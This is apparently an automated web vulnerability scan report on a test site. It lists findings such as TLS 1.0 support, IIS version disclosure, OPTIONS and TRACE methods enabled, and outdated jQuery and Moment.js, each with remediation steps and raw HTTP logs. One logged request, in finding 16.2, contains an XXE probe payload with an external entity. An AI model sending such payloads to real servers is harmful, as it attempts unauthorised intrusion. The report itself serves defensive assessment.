<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">' + "<" + "/script>"); </script>
<!-- <![endif]-->
<!--[if lte IE 9]>
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js">'+"<"+"/script>"); </script>
<![endif]-->


<!-- Pixel Admin's javascripts -->
<script src="assets/javascripts/bootstrap.min.js"></script>


13. Insecure Transportation Security Protocol Supported (TLS 1.0)

1 TOTAL
LOW
Confirmed
1

pentestonline.es detected that insecure transportation security protocol (TLS 1.0) is supported by your web server.

TLS 1.0 has several flaws. An attacker can cause connection failures and they can trigger the use of TLS 1.0 to exploit vulnerabilities like BEAST (Browser Exploit Against SSL/TLS).

Websites using TLS 1.0 are considered non-compliant by PCI since 30 June 2018.

Impact

Attackers can perform man-in-the-middle attacks and observe the encryption traffic between your website and its visitors.

Remedy

Configure your web server to disallow using weak ciphers. You need to restart the web server to enable changes.

  • For Apache, adjust the SSLProtocol directive provided by the mod_ssl module. This directive can be set either at the server level or in a virtual host configuration.
    SSLProtocol +TLSv1.1 +TLSv1.2
    
  • For Nginx, locate any use of the directive ssl_protocols in the nginx.conf file and remove TLSv1.
    ssl_protocols TLSv1.1 TLSv1.2;
    
  • For Microsoft IIS, you should make some changes on the system registry.
    1. Click on Start and then Run, type regedt32 or regedit, and then click OK.
    2. In Registry Editor, locate the following registry key or create if it does not exist:
      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0\
      
    3. Locate a key named Server or create if it doesn't exist.
    4. Under the Server key, locate a DWORD value named Enabled or create if it doesn't exist and set its value to "0".

External References

Classification

OWASP 2017-A9

13.1. https://test.q2bstudio.com/

Confirmed
https://test.q2bstudio.com/

Request

[pentestonline.es] SSL Connection

Response

[pentestonline.es] SSL Connection

14. Version Disclosure (IIS)

1 TOTAL
INFORMATION

pentestonline.es identified a version disclosure (IIS) in target web server's HTTP response.

This information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of IIS.

Impact

An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Remedy References

Classification

OWASP 2017-A6

14.1. http://test.q2bstudio.com/assets/javascripts/ie.min.js

http://test.q2bstudio.com/assets/javascripts/ie.min.js

ExtractedVersion

Microsoft-IIS/8.5

Certainty

Request

GET /assets/javascripts/ie.min.js HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10995
Last-Modified: Mon, 01 Jul 2019 07:45:39 GMT
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Encoding:
Date

15. OPTIONS Method Enabled

11 TOTAL
INFORMATION
Confirmed
11

pentestonline.es detected that OPTIONS method is allowed. This issue is reported as extra information.

Impact

Information disclosed from this page can be used to gain additional information about the target system.

Remedy

Disable OPTIONS method in all production systems.

External References

Classification

OWASP 2017-A6

15.1. http://test.q2bstudio.com/

Confirmed
http://test.q2bstudio.com/

Allowed methods

OPTIONS, TRACE, GET, HEAD, POST

Request

OPTIONS / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 0
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Wed, 29 Jan 2020 12:43:35 GMT

15.2. http://test.q2bstudio.com/assets/

Confirmed
http://test.q2bstudio.com/assets/

Allowed methods

OPTIONS, TRACE, GET, HEAD, POST

Request

OPTIONS /assets/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 0
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Wed, 29 Jan 2020 12:43:40 GMT

15.3. http://test.q2bstudio.com/assets/javascripts/

Confirmed
http://test.q2bstudio.com/assets/javascripts/

Allowed methods

OPTIONS, TRACE, GET, HEAD, POST

Request

OPTIONS /assets/javascripts/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 0
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Wed, 29 Jan 2020 12:43:46 GMT

15.4. http://test.q2bstudio.com/assets/demo/

Confirmed
http://test.q2bstudio.com/assets/demo/

Allowed methods

OPTIONS, TRACE, GET, HEAD, POST

Request

OPTIONS /assets/demo/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 0
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Wed, 29 Jan 2020 12:43:54 GMT

15.5. http://test.q2bstudio.com/Resources/

Confirmed
http://test.q2bstudio.com/Resources/

Allowed methods

OPTIONS, TRACE, GET, HEAD, POST

Request

OPTIONS /Resources/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 0
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Wed, 29 Jan 2020 12:43:56 GMT

15.6. http://test.q2bstudio.com/Resources/images/

Confirmed
http://test.q2bstudio.com/Resources/images/

Allowed methods

OPTIONS, TRACE, GET, HEAD, POST

Request

OPTIONS /Resources/images/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 0
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Wed, 29 Jan 2020 12:43:57 GMT

15.7. http://test.q2bstudio.com/Resources/logo/

Confirmed
http://test.q2bstudio.com/Resources/logo/

Allowed methods

OPTIONS, TRACE, GET, HEAD, POST

Request

OPTIONS /Resources/logo/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 0
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Wed, 29 Jan 2020 12:43:59 GMT

15.8. http://test.q2bstudio.com/assets/stylesheets/

Confirmed
http://test.q2bstudio.com/assets/stylesheets/

Allowed methods

OPTIONS, TRACE, GET, HEAD, POST

Request

OPTIONS /assets/stylesheets/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 0
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Wed, 29 Jan 2020 12:44:00 GMT

15.9. http://test.q2bstudio.com/assets/demo/themes/

Confirmed
http://test.q2bstudio.com/assets/demo/themes/

Allowed methods

OPTIONS, TRACE, GET, HEAD, POST

Request

OPTIONS /assets/demo/themes/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 0
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Wed, 29 Jan 2020 12:45:01 GMT

15.10. http://test.q2bstudio.com/assets/images/

Confirmed
http://test.q2bstudio.com/assets/images/

Allowed methods

OPTIONS, TRACE, GET, HEAD, POST

Request

OPTIONS /assets/images/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 0
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Wed, 29 Jan 2020 12:47:09 GMT

15.11. http://test.q2bstudio.com/assets/images/plugins/

Confirmed
http://test.q2bstudio.com/assets/images/plugins/

Allowed methods

OPTIONS, TRACE, GET, HEAD, POST

Request

OPTIONS /assets/images/plugins/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 0
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Wed, 29 Jan 2020 12:47:19 GMT

16. Autocomplete Enabled (Password Field)

2 TOTAL
INFORMATION
Confirmed
2

pentestonline.es detected that autocomplete is enabled in one or more of the password fields.

Impact

If user chooses to save, data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers, such as cyber cafes or airport terminals.

Actions to Take

  1. Add the attribute autocomplete="off" to the form tag or to individual "input" fields. However, since early 2014, major browsers don't respect this instruction, due to their integrated password management mechanism, and offer to users to store password internally.
  2. Re-scan the application after addressing the identified issues to ensure all of the fixes have been applied properly.

Required Skills for Successful Exploitation

First and foremost, attacker needs either physical access or user-level code execution rights for successful exploitation. Dumping all data from a browser can be fairly easy, and a number of automated tools exist to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the autocomplete feature to see previously entered values.

External References

Classification

OWASP 2017-A6

CVSS 3.0

CVSS Vector String: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Base: 4.6 (Medium)
Temporal: 4.6 (Medium)
Environmental: 4.6 (Medium)

16.1. http://test.q2bstudio.com/

Confirmed
http://test.q2bstudio.com/

Identified Field Name

password_id

Request

GET / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



span class="fa fa-user signin-form-icon"></span>
</div>
<!-- / Username -->

<div class="form-group w-icon">

<input name="password_id" type="password" id="password_id" class="form-control input-lg format_input_login" placeholder="Contraseña" />
<span class="fa fa-lock signin-form-icon"></span>
</div>
<!-- / Password -->
</div>
<!-- / Form -->
</d

16.2. http://test.q2bstudio.com/

Confirmed
http://test.q2bstudio.com/

Identified Field Name

password_id

Request

POST / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 124
Content-Type: application/xml
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "data:;base64,TlM3NzU0NTYxNDQ2NTc1">]><ns>&lfi;</ns>

Response



span class="fa fa-user signin-form-icon"></span>
</div>
<!-- / Username -->

<div class="form-group w-icon">

<input name="password_id" type="password" id="password_id" class="form-control input-lg format_input_login" placeholder="Contraseña" />
<span class="fa fa-lock signin-form-icon"></span>
</div>
<!-- / Password -->
</div>
<!-- / Form -->
</d

17. Out-of-date Version (jQuery)

2 TOTAL
INFORMATION

pentestonline.es identified the target web site is using jQuery and detected that it is out of date.

Impact

Since this is an old version of the software, it may be vulnerable to attacks.

Remedy

Please upgrade your installation of jQuery to the latest stable version.

Remedy References

Classification

OWASP 2017-A9

17.1. http://test.q2bstudio.com/

http://test.q2bstudio.com/

Identified Version

2.0.3

Latest Version

2.2.4 (in this branch)

Vulnerability Database

Result is based on 04/05/2019 16:30:00 vulnerability database content.

Certainty

Request

GET / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



="text/css">

<!-- Get jQuery from Google CDN -->
<!--[if !IE]> -->
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">' + "<" + "/script>"); </script>
<!-- <![endif]-->
<!--[if lte IE 9]>
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js">'+"<"+"/script>"); </script>
<![endif]-->


<!-- Pixel Admin's javascripts -->
<script src="assets/javascripts/bootstrap.min.js"></script>
<script src="assets/javascripts/pixel-admin.min

17.2. http://test.q2bstudio.com/

http://test.q2bstudio.com/

Identified Version

2.0.3

Latest Version

2.2.4 (in this branch)

Vulnerability Database

Result is based on 04/05/2019 16:30:00 vulnerability database content.

Certainty

Request

POST / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 160
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

btnResetPass=%c2%bfOlvidaste+tu+contrase%c3%b1a%3f&username_id=Smith&__VIEWSTATE=IL&__VIEWSTATE_KEY=VS_52.143.173.9_637159022021935337&password_id=N3tsp%40rker-

Response



="text/css">

<!-- Get jQuery from Google CDN -->
<!--[if !IE]> -->
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">' + "<" + "/script>"); </script>
<!-- <![endif]-->
<!--[if lte IE 9]>
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js">'+"<"+"/script>"); </script>
<![endif]-->


<!-- Pixel Admin's javascripts -->
<script src="assets/javascripts/bootstrap.min.js"></script>
<script src="assets/javascripts/pixel-admin.min

18. Out-of-date Version (jQuery UI Autocomplete)

2 TOTAL
INFORMATION

pentestonline.es identified the target web site is using jQuery UI Autocomplete and detected that it is out of date.

Impact

Since this is an old version of the software, it may be vulnerable to attacks.

Remedy

Please upgrade your installation of jQuery UI Autocomplete to the latest stable version.

Remedy References

Classification

OWASP 2017-A9

18.1. http://test.q2bstudio.com/

http://test.q2bstudio.com/

Identified Version

1.10.4

Latest Version

1.12.0 (in this branch)

Vulnerability Database

Result is based on 04/05/2019 16:30:00 vulnerability database content.

Certainty

Request

GET / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Set-Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; path=/; HttpOnly
Set-Cookie: q2blng=ca-ES; expires=Wed, 05-Feb-2020 12:43:22 GMT; path=/
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3261
Content-Type: text/html; charset=utf-8
Content-Encoding:
Date: Wed, 29 Jan 2020 12:43:22 GMT
Cache-Control: private



<!DOCTYPE html>
<!--[if IE 8]> <html class="ie8"> <![endif]-->
<!--[if IE 9]> <html class="ie9 gt-ie8"> <![endif]-->
<!--[if gt IE 9]><!-->
<html class="gt-ie8 gt-ie9 not-ie">
<!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
<link rel="shortcut icon" href="Resources/logo/logo_vc.png" />
<!-- Open Sans font from Google CDN -->
<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,600,700,300&subset=latin" rel="stylesheet" type="text/css">

<!-- Pixel Admin's stylesheets -->
<link href="assets/stylesheets/bootstrap.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pixel-admin.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pages.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/rtl.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/themes.min.css" rel="stylesheet" type="text/css">

<!-- Get jQuery from Google CDN -->
<!--[if !IE]> -->
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">' + "<" + "/script>"); </script>
<!-- <![endif]-->
<!--[if lte IE 9]>
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js">'

18.2. http://test.q2bstudio.com/

http://test.q2bstudio.com/

Identified Version

1.10.4

Latest Version

1.12.0 (in this branch)

Vulnerability Database

Result is based on 04/05/2019 16:30:00 vulnerability database content.

Certainty

Request

POST / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 160
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

btnResetPass=%c2%bfOlvidaste+tu+contrase%c3%b1a%3f&username_id=Smith&__VIEWSTATE=IL&__VIEWSTATE_KEY=VS_52.143.173.9_637159022021935337&password_id=N3tsp%40rker-

Response

HTTP/1.1 200 OK
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3216
Content-Type: text/html; charset=utf-8
Content-Encoding:
Date: Wed, 29 Jan 2020 12:43:32 GMT
Cache-Control: private



<!DOCTYPE html>
<!--[if IE 8]> <html class="ie8"> <![endif]-->
<!--[if IE 9]> <html class="ie9 gt-ie8"> <![endif]-->
<!--[if gt IE 9]><!-->
<html class="gt-ie8 gt-ie9 not-ie">
<!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
<link rel="shortcut icon" href="Resources/logo/logo_vc.png" />
<!-- Open Sans font from Google CDN -->
<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,600,700,300&subset=latin" rel="stylesheet" type="text/css">

<!-- Pixel Admin's stylesheets -->
<link href="assets/stylesheets/bootstrap.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pixel-admin.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pages.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/rtl.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/themes.min.css" rel="stylesheet" type="text/css">

<!-- Get jQuery from Google CDN -->
<!--[if !IE]> -->
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">' + "<" + "/script>"); </script>
<!-- <![endif]-->
<!--[if lte IE 9]>
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js">'+"<"+"/script>"); </script>
<![endif]-->


<!-- Pixel Admin's javascripts -->
<script src="assets/javascripts/bootstrap.min.js"></script>


19. Out-of-date Version (Moment.js)

2 TOTAL
INFORMATION

pentestonline.es identified that the target web site is using Moment.js and detected that it is out of date.

Impact

Since this is an old version of the software, it may be vulnerable to attacks.

Remedy

Please upgrade your installation of Moment.js to the latest stable version.

Remedy References

Classification

OWASP 2017-A9

19.1. http://test.q2bstudio.com/

http://test.q2bstudio.com/

Identified Version

2.5.1

Latest Version

2.24.0 (in this branch)

Vulnerability Database

Result is based on 04/05/2019 16:30:00 vulnerability database content.

Certainty

Request

GET / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Set-Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; path=/; HttpOnly
Set-Cookie: q2blng=ca-ES; expires=Wed, 05-Feb-2020 12:43:22 GMT; path=/
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3261
Content-Type: text/html; charset=utf-8
Content-Encoding:
Date: Wed, 29 Jan 2020 12:43:22 GMT
Cache-Control: private



<!DOCTYPE html>
<!--[if IE 8]> <html class="ie8"> <![endif]-->
<!--[if IE 9]> <html class="ie9 gt-ie8"> <![endif]-->
<!--[if gt IE 9]><!-->
<html class="gt-ie8 gt-ie9 not-ie">
<!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
<link rel="shortcut icon" href="Resources/logo/logo_vc.png" />
<!-- Open Sans font from Google CDN -->
<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,600,700,300&subset=latin" rel="stylesheet" type="text/css">

<!-- Pixel Admin's stylesheets -->
<link href="assets/stylesheets/bootstrap.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pixel-admin.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pages.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/rtl.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/themes.min.css" rel="stylesheet" type="text/css">

<!-- Get jQuery from Google CDN -->
<!--[if !IE]> -->
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">' + "<" + "/script>"); </script>
<!-- <![endif]-->
<!--[if lte IE 9]>
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js">'

19.2. http://test.q2bstudio.com/

